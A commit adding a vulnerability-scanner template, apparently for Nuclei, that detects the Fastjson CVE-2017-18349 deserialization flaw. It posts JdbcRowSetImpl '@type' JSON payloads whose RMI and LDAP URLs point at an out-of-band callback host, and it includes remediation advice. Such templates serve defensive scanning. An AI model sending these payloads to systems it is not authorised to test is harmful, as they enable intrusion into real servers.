Add CVE-2017-18349 Fastjson RCE template

criminalinfluencer · criminalinfluencer · commit 273970a87fd4 · 2025-06-17T21:58:19.000+02:00
diff --git a/http/cves/2017/CVE-2017-18349.yaml b/http/cves/2017/CVE-2017-18349.yaml
@@ -0,0 +1,178 @@
+id: CVE-2017-18349
+
+info:
+  name: Fastjson Insecure Deserialization - Remote Code Execution
+  author: night
+  severity: critical
+  description: |
+    Fastjson before 1.2.25 contains a remote code execution vulnerability in parseObject method.
+    The vulnerability allows remote attackers to execute arbitrary code via crafted JSON requests
+    containing malicious @type annotations that trigger unsafe deserialization of JdbcRowSetImpl.
+    This affects FastjsonEngine in Pippo 1.11.0 and other products using vulnerable Fastjson versions.
+  impact: |
+    Successful exploitation allows complete system compromise through remote code execution,
+    enabling attackers to execute arbitrary commands, access sensitive data, and establish
+    persistent backdoors on the target system.
+  remediation: |
+    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.
+    Implement additional security measures: disable autotype functionality by setting fastjson.parser.autoTypeSupport=false,
+    implement strict whitelist filtering for @type annotations, validate and sanitize all JSON input,
+    use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies
+    for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with
+    secure configurations.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
+    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
+    - https://github.com/pippo-java/pippo/issues/466
+    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
+    - https://fortiguard.com/encyclopedia/ips/44059
+    - https://www.exploit-db.com/exploits/45983
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2017-18349
+    cwe-id: CWE-502
+    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
+    epss-score: 0.97435
+    epss-percentile: 0.99951
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: alibaba
+    product: fastjson
+  tags: cve,cve2017,fastjson,deserialization,rce,critical,intrusive
+
+variables:
+  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
+  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
+
+    body: |
+      {
+        "@type": "com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName": "{{rmi_payload}}",
+        "autoCommit": true
+      }
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+          - interactsh_request
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+      - "{{BaseURL}}/parse"
+      - "{{BaseURL}}/deserialize"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
+
+    body: |
+      {
+        "@type": "com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName": "{{ldap_payload}}",
+        "autoCommit": true
+      }
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+          - interactsh_request
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+      - "{{BaseURL}}/parse"
+      - "{{BaseURL}}/deserialize"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
+
+    body: |
+      {
+        "data": {
+          "@type": "com.sun.rowset.JdbcRowSetImpl",
+          "dataSourceName": "{{rmi_payload}}",
+          "autoCommit": true
+        }
+      }
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+          - interactsh_request
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
+
+    body: |
+      {
+        "b": {
+          "@type": "com.sun.rowset.JdbcRowSetImpl",
+          "dataSourceName": "{{ldap_payload}}",
+          "autoCommit": true
+        }
+      }
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+          - interactsh_request
+
